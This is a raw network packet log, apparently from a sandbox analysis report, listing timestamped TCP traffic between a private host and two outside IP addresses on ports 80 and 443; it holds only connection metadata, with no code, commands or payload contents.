Nov 20, 2024 10:11:13.874702930 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.874732018 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.874764919 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.874766111 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.874778032 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.874813080 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.874885082 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.874917984 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.874933958 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.874965906 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.875138044 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.875171900 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.875195026 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.875205040 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.875217915 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.875246048 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.875258923 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.875300884 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.875603914 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.875637054 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.875660896 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.875669956 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.875675917 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.875705004 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.875713110 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.875739098 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.875746012 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.875772953 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.875808001 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.875817060 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.875842094 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.875847101 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.875886917 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.876493931 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.876548052 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.876554012 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.876581907 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.876595020 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.876617908 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.953434944 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.953469992 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.953481913 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.953520060 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.953546047 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.953651905 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.953694105 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:14.010340929 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:14.010390997 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:14.010428905 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:14.010565996 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:14.010566950 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:14.010740995 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:14.010776043 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:14.010802984 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:14.010809898 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:14.010818005 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:14.010843992 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:14.010848045 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:14.010885000 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:14.010898113 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:14.010930061 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:14.010941029 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:14.010962963 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:14.010967970 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:14.010993004 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:14.011003971 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:14.011027098 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:14.011034012 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:14.011065006 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:14.011077881 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:14.011111975 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:14.011116982 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:14.011147022 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:14.011152029 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:14.011181116 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:14.011185884 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:14.011215925 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:14.011223078 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:14.011250973 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:14.011254072 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:14.011286974 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:14.011292934 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:14.011326075 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:14.011356115 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:14.011389017 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:14.011400938 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:14.011421919 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:14.011426926 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:14.011456013 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:14.011461973 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:14.011490107 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:14.011495113 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:14.011524916 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:14.011528969 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:14.011558056 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:14.011564016 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:14.011596918 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:14.012800932 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:14.012836933 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:14.012870073 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:14.012870073 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:14.012887001 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:14.012904882 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:14.012916088 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:14.012942076 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:14.012950897 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:14.012976885 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:14.012988091 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:14.013076067 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:14.013082981 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:14.013117075 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:14.013151884 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:14.013168097 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:14.013169050 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:14.013201952 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:14.013207912 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:14.013236046 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:14.013242960 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:14.013269901 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:14.013276100 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:14.013303995 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:14.013309002 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:14.013338089 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:14.013345957 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:14.013372898 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:14.013380051 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:14.013412952 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:14.014132023 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:14.014172077 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:14.014203072 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:14.014214993 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:14.014239073 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:14.014242887 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:14.014272928 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:14.014281034 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:14.014307976 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:14.014312983 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:14.014358044 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:14.098160028 CET	49168	443	192.168.2.22	198.244.140.41
Nov 20, 2024 10:11:14.098222017 CET	443	49168	198.244.140.41	192.168.2.22
Nov 20, 2024 10:11:14.099517107 CET	49168	443	192.168.2.22	198.244.140.41
Nov 20, 2024 10:11:14.099517107 CET	49168	443	192.168.2.22	198.244.140.41
Nov 20, 2024 10:11:14.099555969 CET	443	49168	198.244.140.41	192.168.2.22
Nov 20, 2024 10:11:14.721831083 CET	443	49168	198.244.140.41	192.168.2.22
Nov 20, 2024 10:11:14.722158909 CET	49168	443	192.168.2.22	198.244.140.41
Nov 20, 2024 10:11:14.724428892 CET	49168	443	192.168.2.22	198.244.140.41
Nov 20, 2024 10:11:14.724443913 CET	443	49168	198.244.140.41	192.168.2.22
Nov 20, 2024 10:11:14.725846052 CET	49168	443	192.168.2.22	198.244.140.41
Nov 20, 2024 10:11:14.725857973 CET	443	49168	198.244.140.41	192.168.2.22
Nov 20, 2024 10:11:15.016335964 CET	443	49168	198.244.140.41	192.168.2.22
Nov 20, 2024 10:11:15.016408920 CET	443	49168	198.244.140.41	192.168.2.22
Nov 20, 2024 10:11:15.016454935 CET	49168	443	192.168.2.22	198.244.140.41
Nov 20, 2024 10:11:15.016454935 CET	49168	443	192.168.2.22	198.244.140.41
Nov 20, 2024 10:11:15.016566992 CET	49168	443	192.168.2.22	198.244.140.41
Nov 20, 2024 10:11:15.016566992 CET	49168	443	192.168.2.22	198.244.140.41
Nov 20, 2024 10:11:15.016586065 CET	443	49168	198.244.140.41	192.168.2.22
Nov 20, 2024 10:11:15.016649008 CET	49168	443	192.168.2.22	198.244.140.41
Nov 20, 2024 10:11:15.016913891 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:15.021734953 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:15.250508070 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:15.250719070 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:16.201235056 CET	49169	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:16.208138943 CET	80	49169	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:16.208204031 CET	49169	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:16.208429098 CET	49169	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:16.215286970 CET	80	49169	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:16.946014881 CET	80	49169	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:16.946032047 CET	80	49169	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:16.946044922 CET	80	49169	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:16.946078062 CET	80	49169	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:16.946085930 CET	49169	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:16.946090937 CET	80	49169	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:16.946116924 CET	49169	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:16.946118116 CET	49169	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:16.946125984 CET	49169	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:16.946259975 CET	80	49169	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:16.946274042 CET	80	49169	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:16.946300983 CET	49169	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:16.946310997 CET	49169	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:16.946477890 CET	80	49169	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:16.946520090 CET	49169	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:16.946549892 CET	80	49169	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:16.946562052 CET	80	49169	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:16.946595907 CET	49169	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:16.951093912 CET	80	49169	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:16.951129913 CET	80	49169	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:16.951142073 CET	80	49169	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:16.951152086 CET	49169	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:16.951164961 CET	49169	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:16.951183081 CET	49169	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:16.951446056 CET	80	49169	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:16.951499939 CET	49169	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:16.952985048 CET	49169	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:17.090507030 CET	80	49169	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:17.090523005 CET	80	49169	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:17.090540886 CET	80	49169	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:17.090554953 CET	80	49169	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:17.090565920 CET	80	49169	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:17.090578079 CET	80	49169	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:17.090579033 CET	49169	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:17.090590000 CET	80	49169	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:17.090615988 CET	49169	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:17.090615988 CET	49169	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:17.090615988 CET	49169	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:17.090775967 CET	80	49169	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:17.090816975 CET	49169	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:17.182405949 CET	80	49169	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:17.182473898 CET	49169	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:18.015239000 CET	49169	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:20.251553059 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:20.251668930 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:24.280049086 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:24.287035942 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:24.287087917 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:24.287302971 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:24.292218924 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.038772106 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.038808107 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.038819075 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.038830996 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.038834095 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.038844109 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.038856983 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.038875103 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.038875103 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.038885117 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.038894892 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.038949013 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.038984060 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.039562941 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.039577007 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.039587975 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.039612055 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.039627075 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.040867090 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.045048952 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.045154095 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.045527935 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.045540094 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.045552969 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.045576096 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.045597076 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.182337999 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.182354927 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.182368040 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.182408094 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.182430983 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.182640076 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.182687044 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.188517094 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.188529968 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.188549995 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.188561916 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.188574076 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.188590050 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.193358898 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.193372011 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.193407059 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.193470001 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.193485975 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.193522930 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.198242903 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.198256016 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.198266983 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.198295116 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.198307991 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.198385000 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.198398113 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.198424101 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.198436975 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.204544067 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.204556942 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.204592943 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.204658985 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.204669952 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.204699993 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.210666895 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.210707903 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.324376106 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.324392080 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.324404001 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.324440956 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.324642897 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.324656010 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.324667931 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.324687958 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.324774027 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.324785948 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.324820042 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.324975014 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.325017929 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.325568914 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.325579882 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.325589895 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.325617075 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.325629950 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.325798035 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.325890064 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.326327085 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.326358080 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.326366901 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.326370001 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.326387882 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.326402903 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.326663017 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.326880932 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.327225924 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.327236891 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.327248096 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.327266932 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.327280998 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.327519894 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.327569962 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.328058004 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.328069925 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.328080893 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.328099966 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.328115940 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.328388929 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.328429937 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.328902006 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.328912973 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.328922987 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.328954935 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.328968048 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.329190016 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.329229116 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.329663992 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.329745054 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.329765081 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.329777002 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.329793930 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.329811096 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.330024004 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.330064058 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.330734015 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.330744982 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.330755949 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.330777884 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.330805063 CET	49170	80	192.168.2.22	66.63.187.231
